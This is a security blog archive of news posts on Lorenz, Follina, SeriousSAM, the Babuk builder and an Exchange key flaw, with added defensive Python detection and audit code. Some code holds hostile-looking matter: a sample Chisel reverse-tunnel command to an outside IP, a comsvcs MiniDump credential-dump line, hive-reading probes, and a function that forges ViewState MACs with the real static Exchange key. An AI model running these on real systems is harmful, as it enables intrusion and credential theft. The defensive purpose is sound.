Kevin Beaumont Archives – Gridinsoft Blog
https://gridinsoft.com/blogs/tag/kevin-beaumont/
Welcome to the Gridinsoft Blog, where we share posts about security solutions to keep you, your family and business safe.

Lorenz Ransomware Penetrates Company Networks through Mitel VoIP Products
https://gridinsoft.com/blogs/lorenz-and-mitel-ransomware/
Thu, 15 Sep 2022 11:51:13 +0000

Security firm Arctic Wolf has warned that Lorenz ransomware is exploiting a critical vulnerability in Mitel MiVoice VoIP devices to infiltrate corporate networks.

Let me remind you that we also wrote that Ransomware publishes data stolen from Cisco.

Lorenz has been active since at least 2021 and engages in the usual double extortion: it not only encrypts the files on its victims’ machines but also steals the affected companies’ data and then threatens to publish it if the ransom is not paid.

Last year, the group was credited with an attack on the EDI provider Commport Communications, and this year, researchers have recorded Lorenz activity in the US, China and Mexico, where hackers attacked small and medium-sized businesses.

As Arctic Wolf analysts now report, the group is exploiting CVE-2022-29499, a vulnerability discovered and patched in June 2022. This bug in Mitel MiVoice Connect VoIP appliances allows unauthenticated remote code execution (RCE); in the observed intrusions it was used to obtain a reverse shell into the victim’s network.


Mitel VoIP solutions are used by organizations and governments in mission-critical sectors around the world. According to information security expert Kevin Beaumont, more than 19,000 such devices are currently exposed to attack over the Internet.

Read also our article on the methods hackers use to infect you with ransomware.

In general, Lorenz’s tactics are similar to those described in the report by CrowdStrike, which discovered this bug and tracked the ransomware that used it. After the initial compromise, Lorenz deploys a copy of Chisel, an open-source TCP tunneling tool, on the affected company’s network and uses it for lateral movement.

At the same time, Arctic Wolf experts note that after a Mitel device is compromised, the attackers wait about a month before developing the attack further.

The researchers write that the attackers use well-known, widely available tools to dump credentials and carry out reconnaissance. The group then begins lateral movement using the compromised credentials, including those of a hijacked domain administrator account.

Before encrypting the victim’s files, Lorenz exfiltrates data using the FileZilla FTP client. BitLocker is then used to encrypt the victim’s files.
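The chain above (tunnel, credential dump, exfiltration, BitLocker) is the kind of sequence a detection engineer wants to correlate per host rather than alert on tool by tool. The following is an added example, not code from the Gridinsoft post or from the Arctic Wolf report: it runs constructed process-creation records (field names mimic Sysmon Event ID 1; every host name, path, IP and timestamp is made up) through one rule per stage, groups hits by host and reports the dwell time between the first and last hit. The Chisel rule matches the argument syntax rather than the binary name, so a renamed chisel.exe is still caught.

```python
"""Stage-aware detection for the Lorenz tooling described above.

Added example; it is not code from the Gridinsoft post or from the Arctic
Wolf report.  It scans constructed process-creation records (field names
mimic Sysmon Event ID 1; every record, host name, path and timestamp is
made up) for the tools the post names, groups the hits per host, and only
alerts when more than one stage of the chain has been seen on the same
host, so a lone FileZilla launch on a workstation is not an alert.
"""
import re
from collections import defaultdict
from datetime import datetime

# (stage, pattern) in the order the post describes the chain.
STAGE_RULES = (
    # Chisel reverse tunnel.  Matching the argument syntax
    # ("client <server> R:<port>:<host>:<port>") instead of the binary name
    # still catches a renamed chisel.exe.
    ("tunnel", re.compile(r"\bclient\s+\S+\s+R:\d+:\S+", re.I)),
    # Credential dumping with widely used tooling.
    ("cred_dump", re.compile(
        r"\bsecretsdump\b|\bmimikatz\b|comsvcs\.dll,\s*MiniDump", re.I)),
    # Exfiltration with the FileZilla client.
    ("exfil", re.compile(r"\bfilezilla(?:\.exe)?\b", re.I)),
    # BitLocker being turned on (or a protector added) from a command line.
    ("encrypt", re.compile(
        r"\bmanage-bde(?:\.exe)?\b.*\s-(?:on|protectors\s+-add)\b", re.I)),
)

def classify(cmdline):
    """Return the chain stage a command line matches, or None."""
    for stage, rule in STAGE_RULES:
        if rule.search(cmdline):
            return stage
    return None

def build_timelines(events):
    """Map Computer -> [(stage, datetime)], sorted by time, matches only."""
    timelines = defaultdict(list)
    for ev in events:
        stage = classify(ev["CommandLine"])
        if stage:
            timelines[ev["Computer"]].append(
                (stage, datetime.fromisoformat(ev["UtcTime"])))
    return {h: sorted(t, key=lambda e: e[1]) for h, t in timelines.items()}

def alerts(events, min_stages=2):
    """Hosts on which at least `min_stages` distinct stages were seen.

    Returns {host: {"stages": [stages in order of first sighting],
                    "dwell_days": days between first and last hit}}.
    The dwell figure is what lets an analyst compare against the roughly
    one-month pause Arctic Wolf reports between foothold and follow-up.
    """
    result = {}
    for host, timeline in build_timelines(events).items():
        seen = []
        for stage, _ in timeline:
            if stage not in seen:
                seen.append(stage)
        if len(seen) >= min_stages:
            result[host] = {
                "stages": seen,
                "dwell_days": (timeline[-1][1] - timeline[0][1]).days,
            }
    return result

# Constructed sample telemetry (not real events).
SAMPLE_EVENTS = [
    {"UtcTime": "2022-06-02 03:14:07", "Computer": "FS01",
     "CommandLine": r"C:\Windows\Temp\ch.exe client 203.0.113.5:8000 R:4444:127.0.0.1:3389"},
    {"UtcTime": "2022-07-01 22:40:10", "Computer": "FS01",
     "CommandLine": r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 712 C:\Windows\Temp\l.dmp full"},
    {"UtcTime": "2022-07-03 01:12:55", "Computer": "FS01",
     "CommandLine": r'"C:\Users\svc_backup\Downloads\FileZilla\filezilla.exe"'},
    {"UtcTime": "2022-07-04 06:00:00", "Computer": "FS01",
     "CommandLine": r"manage-bde.exe -on D: -RecoveryPassword -UsedSpaceOnly"},
    # Benign: an admin using FileZilla on a workstation; one stage only.
    {"UtcTime": "2022-07-03 09:30:00", "Computer": "WS07",
     "CommandLine": r'"C:\Program Files\FileZilla FTP Client\filezilla.exe"'},
    {"UtcTime": "2022-07-03 09:31:00", "Computer": "WS07",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs"},
]

if __name__ == "__main__":
    for host, info in alerts(SAMPLE_EVENTS).items():
        print(host, info)
```

On the sample data only FS01 is reported, with all four stages in order and a 32-day dwell; WS07 has a single FileZilla hit and stays below the threshold. In a real deployment the records would come from the SIEM and the threshold and dwell window would be tuned to the environment.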

Genshin Impact Game’s Anti-Cheat Driver Is Used to Disable Antiviruses
https://gridinsoft.com/blogs/genshin-impact-anti-cheat-driver/
Mon, 29 Aug 2022 13:54:21 +0000

Trend Micro experts have discovered that hackers are abusing the kernel-mode anti-cheat driver of the popular game Genshin Impact to disable anti-virus software during ransomware attacks. The driver, mhyprot2.sys, gives access to the memory of any process and to kernel memory, and can also terminate processes with the highest privileges.

Let me remind you that we also wrote that Tencent and Chinese police conducted a joint operation against game cheat developers.

The mhyprot2.sys problem has been known since at least 2020, and information security experts have long been appealing to the makers of anti-cheat systems in general, since most of these solutions run in ring 0 (kernel mode), which can hardly be considered safe.

In the case of mhyprot2.sys, the experts’ appeals had no effect: the code-signing certificate was not revoked, so the driver can still be loaded on Windows without raising an alarm. Worse, since 2020 two PoC exploits have been available on GitHub, together with a detailed description of how the anti-cheat driver can be used from user mode to read and write kernel memory with kernel-mode privileges, terminate arbitrary processes, and so on.

A recent Trend Micro report states that hackers have been abusing the driver since July 2022 and using it to disable properly configured security solutions.


Analysts write that in the case they studied, the attackers used Impacket’s secretsdump and wmiexec against the target machine, and then connected to the domain controller via RDP using stolen administrator credentials.

The first action the hackers took on the compromised machine was to copy mhyprot2.sys to the desktop along with the malicious executable kill_svc.exe, which was used to install the driver. The attackers then downloaded the file avg.msi, which in turn downloaded and executed the following four files:

  1. logon.bat – launches HelpPane.exe, “kills” the antivirus and other services, and launches svchost.exe;
  2. HelpPane.exe – disguised as the Microsoft Help and Support executable; like kill_svc.exe, it installs mhyprot2.sys and “kills” anti-virus services;
  3. mhyprot2.sys – the Genshin Impact anti-cheat driver;
  4. svchost.exe – an unnamed ransomware payload, not the genuine Windows service host.

In this incident, the attackers tried three times to encrypt the files on the compromised workstation without success, although the anti-virus services were successfully disabled. In the end, the attackers simply copied logon.bat to the desktop and ran it manually, and that worked.


By the end of the attack, the hackers had copied the driver, the ransomware and the kill_svc.exe executable to a network share for mass deployment, aiming to infect as many workstations as possible.

Trend Micro warns that hackers may continue to use the anti-cheat module, because even if the vendor fixes the vulnerability, old versions of mhyprot2.sys will remain in circulation and the module can be bundled with any malware. At the same time, the experts note that code-signed modules that act as device drivers and can be abused in this way are still quite rare.

“At the time of this writing, the code signature for mhyprot2.sys was still valid. For the attack to work, Genshin Impact does not need to be installed on the victim’s device. The use of the driver does not depend on the game,” the company warns.

In response to the publication of this report, well-known information security expert Kevin Beaumont noted on Twitter that administrators can protect against this threat by blocking the SHA-1 hash “0466e90bf0e83b776ca8716e01d35a8a2e5f96d3”, which corresponds to the vulnerable mhyprot2.sys driver.
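Blocking by hash is the right call here precisely because the driver’s signature is valid and the file name is trivial to change. The following is an added example, not code from the Gridinsoft post, Trend Micro’s report or Kevin Beaumont: it evaluates constructed driver-load records shaped like Sysmon Event ID 6 (DriverLoad), whose Hashes field is a comma-separated list of ALG=hex pairs. The only real datum is the SHA-1 quoted above; every path and the other hashes are made up. The check alerts on a blocked hash regardless of file name, and separately on any driver loaded from outside the system driver directories, which is how the driver was loaded in the incident (from the desktop).

```python
"""Hash- and path-based check for a known-abusable signed driver.

Added example; not code from the Gridinsoft post, Trend Micro's report or
Kevin Beaumont.  It evaluates constructed driver-load records shaped like
Sysmon Event ID 6 (DriverLoad), whose Hashes field is a comma-separated
"ALG=hex" list.  The only real datum is the SHA-1 the post quotes for the
abusable mhyprot2.sys; every path and other hash is made up.  The
signature status is deliberately ignored: the driver's signature is valid,
which is exactly why signature checks alone do not stop it.
"""

# Block list keyed by SHA-1, as Beaumont suggested.  Only the hash comes
# from the post; the label is ours.
BLOCKED_SHA1 = {
    "0466e90bf0e83b776ca8716e01d35a8a2e5f96d3":
        "mhyprot2.sys (abusable anti-cheat driver)",
}

# Directories a properly installed driver is expected to load from.
# A .sys loaded from Desktop, Downloads, Temp or a share is suspicious
# regardless of its hash.
TRUSTED_DRIVER_DIRS = (
    "c:\\windows\\system32\\drivers\\",
    "c:\\windows\\system32\\driverstore\\",
)

def parse_hashes(field):
    """'SHA1=...,MD5=...' -> {'sha1': '...', 'md5': '...'} (lower-cased)."""
    out = {}
    for part in field.split(","):
        if "=" in part:
            alg, val = part.split("=", 1)
            out[alg.strip().lower()] = val.strip().lower()
    return out

def evaluate_driver_load(event):
    """Return the reasons (possibly none) to alert on one DriverLoad event."""
    reasons = []
    sha1 = parse_hashes(event.get("Hashes", "")).get("sha1")
    if sha1 in BLOCKED_SHA1:
        reasons.append("blocked hash: " + BLOCKED_SHA1[sha1])
    image = event.get("ImageLoaded", "")
    if not any(image.lower().startswith(d) for d in TRUSTED_DRIVER_DIRS):
        reasons.append("loaded from untrusted path: " + image)
    return reasons

def scan(events):
    """Map ImageLoaded -> reasons for every event that has at least one."""
    flagged = {}
    for ev in events:
        reasons = evaluate_driver_load(ev)
        if reasons:
            flagged[ev["ImageLoaded"]] = reasons
    return flagged

# Constructed sample records.  The MD5 values are placeholders
# (MD5 of the empty string), not the real digests of any driver.
PLACEHOLDER_MD5 = "d41d8cd98f00b204e9800998ecf8427e"
SAMPLE_EVENTS = [
    # The post's scenario: driver dropped on the desktop and loaded from there.
    {"ImageLoaded": r"C:\Users\victim\Desktop\mhyprot2.sys",
     "Hashes": "SHA1=0466E90BF0E83B776CA8716E01D35A8A2E5F96D3,MD5=" + PLACEHOLDER_MD5,
     "SignatureStatus": "Valid"},
    # Same driver, renamed: a file-name rule would miss it, the hash does not.
    {"ImageLoaded": r"C:\Users\victim\AppData\Local\Temp\av.sys",
     "Hashes": "SHA1=0466e90bf0e83b776ca8716e01d35a8a2e5f96d3",
     "SignatureStatus": "Valid"},
    # Same driver in the real driver directory: path looks fine, hash does not.
    {"ImageLoaded": r"C:\Windows\System32\drivers\mhyprot2.sys",
     "Hashes": "SHA1=0466e90bf0e83b776ca8716e01d35a8a2e5f96d3,MD5=" + PLACEHOLDER_MD5,
     "SignatureStatus": "Valid"},
    # A normal Microsoft driver with a made-up, non-blocked hash.
    {"ImageLoaded": r"C:\Windows\System32\drivers\tcpip.sys",
     "Hashes": "SHA1=1111111111111111111111111111111111111111,MD5=" + PLACEHOLDER_MD5,
     "SignatureStatus": "Valid"},
]

if __name__ == "__main__":
    for path, why in scan(SAMPLE_EVENTS).items():
        print(path, "->", "; ".join(why))
```

Alerting after the load is the detection half; the preventive half is a deny rule on the same hash in an application-control policy (WDAC) so the kernel refuses the load in the first place.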

Attackers Are Already Exploiting the Fresh 0-day Follina Bug in Microsoft Office
https://gridinsoft.com/blogs/follina-in-microsoft-office/
Wed, 01 Jun 2022 14:53:00 +0000

Security researchers recently discovered a zero-day vulnerability in Microsoft Office dubbed Follina. The bug can be exploited simply by opening a Word document, which then executes malicious PowerShell commands through the Microsoft Support Diagnostic Tool (MSDT).

Let me remind you that we also wrote that Lapsus$ hack group stole the source codes of Microsoft products, and also that Microsoft Has Not Fully Coped with PetitPotam Attacks in Windows NTLM Relay.

The discovery of Follina is a worrying sign, as the vulnerability opens up a new attack vector through Microsoft Office: the bug works without elevated privileges, evaded Windows Defender detection at the time, and does not require macros to be enabled in order to execute binaries or scripts.

The first malicious Word document exploiting this bug was discovered by the information security researcher nao_sec, who spotted a file on VirusTotal that had been uploaded from a Belarusian IP address. Attacks exploiting this problem apparently began as early as April 2022, with fake interview invitations and sextortion used as lures.

“I searched VirusTotal for files that would exploit the CVE-2021-40444 vulnerability. I then discovered a file that was abusing the ms-msdt scheme. It used a Word external link to load the HTML, and after that the ms-msdt scheme to execute the PowerShell code,” says the researcher.


Well-known information security expert Kevin Beaumont studied his colleague’s find, decoded the payload and explained in his blog that it is a command-line string that Microsoft Word executes through MSDT even when macros are disabled. Beaumont elaborates that the malicious Word document uses the remote template feature to download an HTML file from a server. This HTML then uses the Microsoft ms-msdt URI scheme to load additional code and execute the PowerShell payload.

Opening such a document should trigger Office’s Protected View, which warns about files from potentially unsafe sources, but, according to Beaumont, this warning can be bypassed by using a Rich Text Format (RTF) file. The malicious code can then run “even without opening the document, that is, through the preview in Explorer.”
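The two observable steps of the chain, an external template relationship inside the .docx and an ms-msdt: hand-off in the HTML it fetches, are both easy to check statically. The following is an added example, not code from the Gridinsoft post, nao_sec, Kevin Beaumont or Huntress: it reads the relationship parts of a .docx for an external attachedTemplate target and scans the HTML for the ms-msdt: scheme and the PCWDiagnostic troubleshooter that the in-the-wild sample invoked. The document and the HTML are constructed in memory; example.invalid is a reserved hostname and the HTML carries a placeholder where the real sample carried its payload.

```python
"""Static triage of a Word document for the Follina chain described above.

Added example; not code from the Gridinsoft post, nao_sec, Kevin Beaumont
or Huntress.  It makes two checks: does the .docx carry an external
"attachedTemplate" relationship (the remote-template step), and does the
HTML that such a template would fetch hand off to the ms-msdt: URI scheme.
The document and the HTML are constructed in memory; example.invalid is a
reserved hostname and the HTML carries a placeholder, not a payload.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                     "relationships/attachedTemplate")
# The scheme itself plus the troubleshooter the in-the-wild sample invoked.
MSDT_RE = re.compile(r"ms-msdt:", re.I)
PCW_RE = re.compile(r"/id\s+PCWDiagnostic\b", re.I)

def external_templates(docx_bytes):
    """Return targets of external attachedTemplate relationships in a .docx."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not (name.startswith("word/_rels/") and name.endswith(".rels")):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter("{%s}Relationship" % REL_NS):
                if (rel.get("Type") == ATTACHED_TEMPLATE
                        and rel.get("TargetMode", "").lower() == "external"):
                    hits.append(rel.get("Target"))
    return hits

def html_indicators(html):
    """Which Follina markers the fetched HTML contains."""
    return {"ms-msdt": bool(MSDT_RE.search(html)),
            "pcwdiagnostic": bool(PCW_RE.search(html))}

def triage(docx_bytes, fetched_html=None):
    """'benign', 'suspicious' (remote template only) or 'follina'."""
    templates = external_templates(docx_bytes)
    if not templates:
        return "benign"
    if fetched_html and html_indicators(fetched_html)["ms-msdt"]:
        return "follina"
    return "suspicious"

def build_sample_docx(template_url=None):
    """Constructed minimal .docx; with a URL it points settings.xml at a
    remote template, without one it only has an internal relationship."""
    if template_url:
        rel = ('<Relationship Id="rId1" Type="%s" Target="%s" '
               'TargetMode="External"/>' % (ATTACHED_TEMPLATE, template_url))
    else:
        rel = ('<Relationship Id="rId1" Type="%s" Target="fontTable.xml"/>'
               % (ATTACHED_TEMPLATE.rsplit("/", 1)[0] + "/fontTable"))
    rels = ('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
            '<Relationships xmlns="%s">%s</Relationships>' % (REL_NS, rel))
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")     # stub parts
        z.writestr("word/document.xml", "<document/>")
        z.writestr("word/settings.xml", "<settings/>")
        z.writestr("word/_rels/settings.xml.rels", rels)
    return buf.getvalue()

# Constructed stand-in for the HTML a remote template would fetch.
SAMPLE_HTML = """<html><body><script>
window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param PLACEHOLDER";
</script></body></html>"""

if __name__ == "__main__":
    doc = build_sample_docx("http://example.invalid/rt.html")
    print(external_templates(doc), triage(doc, SAMPLE_HTML))
```

A remote template on its own is legitimate in some corporate setups, so the verdict stays at “suspicious” until the fetched HTML shows the ms-msdt: hand-off; the RTF variant carries the same URL in its template control word and needs the same second check.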

According to Bleeping Computer, many information security specialists have already studied the malicious document and reproduced the exploit on several versions of Microsoft Office. The researchers confirmed the vulnerability in Office 2013, Office 2016, the April release of Office Pro Plus (on Windows 11 with the May updates) and a fully patched Office 2021.

According to experts, an attacker can use such an exploit to reach various parts of the victim’s network. Depending on the payload, the attacker can collect password hashes from the victim’s Windows machines, which is useful for further post-exploitation.

A detailed technical description of the exploit is already available on the Huntress blog.

Interestingly, it now turns out that the Follina vulnerability was discovered back in April of this year and Microsoft was notified about it at the time.

According to screenshots posted by crazyman, a member of the Shadow Chaser Group (an association of college students engaged in finding and analyzing APT activity), Microsoft was informed about the vulnerability but considered it “not a security-related issue.” Microsoft argued that although msdt.exe was indeed started, it required a password to run, and the company was unable to reproduce the exploit.


Now Microsoft has acknowledged that the problem is indeed security-related: the vulnerability has received the identifier CVE-2022-30190, and the bug is reported to affect all versions of Windows that still receive security updates, that is, Windows 7 and newer and Windows Server 2008 and newer.

“An attacker who successfully exploited this vulnerability could run arbitrary code with the privileges of the calling application. The attacker would then be able to install programs, view, change or delete data, as well as create new accounts in the context of the rights of the current user,” Microsoft experts warn in a blog post.

Since there is no patch yet, administrators and users can block attacks on CVE-2022-30190 by disabling the MSDT URL protocol, which the attackers use to launch troubleshooters and execute code on vulnerable systems. Microsoft’s published workaround is to back up the HKEY_CLASSES_ROOT\ms-msdt registry key with “reg export” and then remove it with “reg delete HKEY_CLASSES_ROOT\ms-msdt /f” from an administrative command prompt.

Although Microsoft Defender signature version 1.367.719.0 already detects exploitation of the vulnerability, and Protected View and Application Guard in Microsoft Office should block attacks, security experts warn that these protections are powerless if the attack is carried out through the preview pane in Explorer rather than by opening a document. It is therefore also recommended to disable the preview pane in Windows Explorer.

Vulnerability in Windows 10 could allow gaining administrator privileges
https://gridinsoft.com/blogs/vulnerability-in-windows-10/
Thu, 22 Jul 2021 16:48:28 +0000

Last weekend, the well-known cybersecurity researcher Jonas Lykkegaard reported a rather serious vulnerability in Windows 10.

All versions of Windows 10 released in the last two and a half years (as well as Windows 11) are vulnerable to an issue dubbed SeriousSAM or HiveNightmare. Thanks to this bug, an attacker can elevate privileges and gain access to the password hashes of user accounts.

The vulnerability relates to how Windows 10 controls access to the registry hive files SAM, SECURITY and SYSTEM:

  • C:\Windows\System32\config\sam
  • C:\Windows\System32\config\security
  • C:\Windows\System32\config\system

Let me remind you that these files store information such as the hashed passwords of all local Windows user accounts, security-related settings, encryption key data and other important details of the OS configuration. If a potential attacker can read the files, the information obtained will help him gain access to user passwords and critical system settings.

Normally only a Windows administrator can interact with these files. However, while testing Windows 11 the researcher noticed that although the live files are held locked by the OS, their ACLs grant read access to non-administrative users, and readable copies of them are present in Volume Shadow Copies. Moreover, as it turned out, this problem appeared in Windows 10 with the release of version 1809 back in 2018.

Access to the Security Account Manager (SAM) database is always a serious problem, because an attacker can extract the hashed passwords, crack them and hijack accounts. Even worse, SYSTEM and SECURITY contain other, equally dangerous data, including DPAPI encryption keys and machine account details (used to join computers to Active Directory). Such an attack was demonstrated in a video recorded by the creator of Mimikatz, Benjamin Delpy.

Microsoft has already acknowledged the problem and assigned it an ID CVE-2021-36934.

The privilege escalation vulnerability exists because of overly permissive Access Control Lists (ACLs) on several system files, including the Security Accounts Manager (SAM) database.

“[After a successful attack] an attacker will be able to install programs, view, modify or delete data, or create new accounts with full user rights. To exploit the vulnerability, an attacker must be able to execute code on the victim’s system,” Microsoft representatives wrote.

So far Microsoft is only investigating the issue and working on a patch, which will most likely be released as an emergency security update later this week. For now the company only recommends restricting access to the problem folder (re-enabling ACL inheritance on the files in %windir%\system32\config with “icacls %windir%\system32\config\*.* /inheritance:e”) and deleting existing shadow copies.

It is worth noting that well-known information security expert Kevin Beaumont has already published a PoC exploit for SeriousSAM so that admins can check which of their systems are vulnerable.
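An administrator checking for the condition needs two things: whether the hive files’ ACLs still grant BUILTIN\Users a read right, and whether any shadow copy exposes a readable copy. The following is an added example, not Jonas Lykkegaard’s finding, Benjamin Delpy’s demo or Kevin Beaumont’s PoC: it parses icacls output (the text below is constructed to look like the vulnerable output, not captured from a real machine) and, on Windows only, probes the shadow-copy device paths that a low-privileged user would read; on other platforms that probe returns an empty list.

```python
"""Checks for the CVE-2021-36934 (SeriousSAM / HiveNightmare) conditions.

Added example; it is not Jonas Lykkegaard's finding, Benjamin Delpy's demo
or Kevin Beaumont's PoC.  Part one parses `icacls` output for the hive
files and reports which of them grant BUILTIN\\Users a read right (the
over-permissive ACL at the root of the bug).  Part two, on Windows only,
tries to open the hive copies through the shadow-copy device paths, which
is what a low-privileged user would abuse.  The icacls text below is
constructed to look like the vulnerable output; it is not captured output.
"""
import os
import re

HIVES = ("SAM", "SECURITY", "SYSTEM")
# icacls prints "<principal>:(flags)(flags)..."; rights that let a
# principal read the file are R, RX, M (modify) and F (full).
ACE_RE = re.compile(r"^(?P<who>.+?):(?P<rights>(?:\([^)]*\))+)\s*$")
PATH_RE = re.compile(r"^(?P<path>[A-Za-z]:\\\S+)\s+(?P<rest>.*)$")
READ_RIGHTS = {"R", "RX", "M", "F"}

def parse_icacls(text):
    """icacls output -> {file path: {principal: [right tokens]}}."""
    acls, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        m = PATH_RE.match(line)
        if m:                      # first ACE of a file shares its line
            current = m.group("path")
            acls[current] = {}
            line = m.group("rest")
        ace = ACE_RE.match(line)
        if ace and current:
            tokens = re.findall(r"\(([^)]*)\)", ace.group("rights"))
            acls[current][ace.group("who")] = tokens
    return acls

def vulnerable_hives(icacls_text):
    """Hive files on which BUILTIN\\Users holds a read right."""
    bad = []
    for path, aces in parse_icacls(icacls_text).items():
        users = aces.get("BUILTIN\\Users", [])
        if READ_RIGHTS & set(users):
            bad.append(path)
    return bad

def readable_shadow_hives(max_copies=5):
    """On Windows, return shadow-copy hive paths the current user can open.
    Returns [] elsewhere.  Shadow copy indexes 1..max_copies are probed."""
    if os.name != "nt":
        return []
    found = []
    for i in range(1, max_copies + 1):
        for hive in HIVES:
            p = (r"\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy%d"
                 r"\Windows\System32\config\%s" % (i, hive))
            try:
                with open(p, "rb") as f:
                    f.read(4)          # 'regf' on a real hive
                found.append(p)
            except OSError:
                pass
    return found

# Constructed: what `icacls` output on the SAM and SYSTEM hives looks like
# on an affected build (Users gets RX through inheritance).
VULNERABLE_OUTPUT = r"""
C:\Windows\System32\config\SAM NT AUTHORITY\SYSTEM:(I)(F)
                               BUILTIN\Administrators:(I)(F)
                               BUILTIN\Users:(I)(RX)
                               APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
C:\Windows\System32\config\SYSTEM NT AUTHORITY\SYSTEM:(I)(F)
                                  BUILTIN\Administrators:(I)(F)
                                  BUILTIN\Users:(I)(RX)
Successfully processed 2 files; Failed processing 0 files
"""

# Constructed: the same file after the ACL has been corrected.
FIXED_OUTPUT = r"""
C:\Windows\System32\config\SAM NT AUTHORITY\SYSTEM:(I)(F)
                               BUILTIN\Administrators:(I)(F)
Successfully processed 1 files; Failed processing 0 files
"""

if __name__ == "__main__":
    print("vulnerable ACLs:", vulnerable_hives(VULNERABLE_OUTPUT))
    print("readable shadow hives:", readable_shadow_hives())
```

Fixing the ACL alone is not enough: a shadow copy taken before the fix still holds a readable copy, which is why Microsoft’s workaround pairs the icacls command with deleting existing shadow copies (vssadmin delete shadows /for=%systemdrive% /Quiet); a fresh shadow copy created after the ACL change would inherit the corrected permissions.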

Let me remind you that I also reported that Windows 10 bug causes BSOD when opening a specific path.

Babuk Locker ransomware builder leaked into the network
https://gridinsoft.com/blogs/babuk-locker-builder/
Tue, 29 Jun 2021 16:03:09 +0000

The Babuk Locker ransomware builder has appeared in the public domain; with it anyone can build their own ransomware, well-known information security expert Kevin Beaumont said on Twitter.

A copy has already been uploaded to VirusTotal.

“Ransomware leak time – Babuk’s builder. Used for making Babuk payloads and decryption. builder.exe foldername, e.g. builder.exe victim will spit out payloads for: Windows, VMware ESXi, network attached storage x86 and ARM. note.txt must contain ransom. It generates the decrypters for each platform too, including VMware ESXi etc.,” Kevin Beaumont wrote on Twitter.

The Record, which has studied the leak, reports that the Babuk Locker builder can be used to create custom versions of the ransomware that encrypt files on Windows systems, ARM-based NAS devices and VMware ESXi servers.


The builder also generates a matching decryptor for each ransomware build, which can be used to recover the encrypted files of that particular victim.


The leak came two months after the Babuk Locker operators announced the cessation of their activity, following a high-profile attack on the Washington, DC Metropolitan Police Department.

The hackers are believed to have renamed their “leak site” Payload.bin and now offer it to other criminals as third-party hosting, where a gang can publish stolen files without running a leak site of its own.

It is not yet clear whether the authors of Babuk Locker tried to sell their builder to a third party (and it leaked as a result of a failed deal), or whether competitors or cybersecurity researchers arranged the leak.

The Babuk builder was leaked two weeks after the source code of the Paradise ransomware builder was posted on a public hacker forum.

While the two incidents are believed to be unrelated, both worry cybersecurity experts, who expect criminal gangs to use the two tools for future, potentially devastating attacks.

“Hopefully this [leak] can be used to conduct discovery and decryption research,” Beaumont writes.

Let me remind you that I also wrote that Clop ransomware continues to work even after a series of arrests.

Hackers scan network for vulnerable Microsoft Exchange servers
https://gridinsoft.com/blogs/hackers-scan-network-for-vulnerable-microsoft-exchange-servers/
Fri, 28 Feb 2020 16:25:35 +0000

Information security experts warn that hackers are already scanning the Internet for Microsoft Exchange servers vulnerable to CVE-2020-0688, which Microsoft fixed two weeks ago.

The problem lies in the Exchange Control Panel (ECP) component: Microsoft Exchange failed to generate unique cryptographic keys (the ASP.NET machineKey used to validate ViewState) during installation, so every installation shared the same static keys.

“The bug allows authenticated attackers to remotely execute arbitrary code with SYSTEM privileges and completely compromise the vulnerable server,” is how Microsoft experts describe the problem.

A demonstration of the problem with the static cryptographic keys on an unpatched server has already been published by the Zero Day Initiative (see the video below). The researchers warn that any remote attacker who compromises the device or credentials of a company employee will be able to reach the Exchange server and read and forge corporate mail.
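Two things follow from a key that every installation shares: an administrator can tell an unpatched server from a patched one by looking at the ECP web.config, and an attacker who has the key can sign arbitrary ViewState that the server will accept. The following is an added example, not code from the Gridinsoft post, ZDI or Microsoft. The validationKey constant is the static value unpatched Exchange installs shared, as published by ZDI; the web.config fragments are constructed, the config path is an assumption for an Exchange 2013+ layout, and the MAC is modelled as a plain HMAC-SHA1 over the payload rather than the real .NET ViewState encoding, which is enough to show that whoever knows the key can sign whatever they like.

```python
"""Audit for the static ASP.NET machineKey behind CVE-2020-0688 and a model
of why a shared key breaks ViewState integrity.

Added example; not code from the Gridinsoft post, ZDI or Microsoft.  The
validationKey constant is the static value that unpatched Exchange installs
shared (as published by ZDI); the web.config fragments are constructed,
and the MAC is modelled as a plain HMAC-SHA1 over the payload rather than
the real .NET ViewState encoding.
"""
import hashlib
import hmac
import xml.etree.ElementTree as ET

# Static validationKey shared by every pre-patch Exchange install (ZDI).
STATIC_VALIDATION_KEY = "CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF"
# Where the affected config normally lives (assumed Exchange 2013+ layout).
ECP_WEB_CONFIG = (r"C:\Program Files\Microsoft\Exchange Server\V15"
                  r"\ClientAccess\ecp\web.config")

def machine_key(web_config_xml):
    """Attributes of the first <machineKey> element in a web.config, or {}."""
    root = ET.fromstring(web_config_xml)
    for node in root.iter("machineKey"):
        return dict(node.attrib)
    return {}

def uses_static_key(web_config_xml):
    """True if the config still carries the well-known static validationKey."""
    key = machine_key(web_config_xml).get("validationKey", "")
    return key.upper() == STATIC_VALIDATION_KEY

def viewstate_mac(key_hex, payload):
    """Simplified ViewState MAC: HMAC-SHA1(key, payload)."""
    return hmac.new(bytes.fromhex(key_hex), payload, hashlib.sha1).digest()

def server_accepts(server_key_hex, payload, mac):
    """What the server side of the integrity check looks like."""
    return hmac.compare_digest(viewstate_mac(server_key_hex, payload), mac)

def forge_with_static_key(payload):
    """An attacker who knows the leaked key signs arbitrary data offline."""
    return viewstate_mac(STATIC_VALIDATION_KEY, payload)

# Constructed web.config fragments (not real Exchange files).
VULNERABLE_CONFIG = """<configuration>
  <system.web>
    <machineKey validationKey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF"
                decryptionKey="PLACEHOLDER" validation="SHA1" decryption="3DES" />
  </system.web>
</configuration>"""

# Made-up per-install key, as the patch generates for each server.
PATCHED_CONFIG = VULNERABLE_CONFIG.replace(
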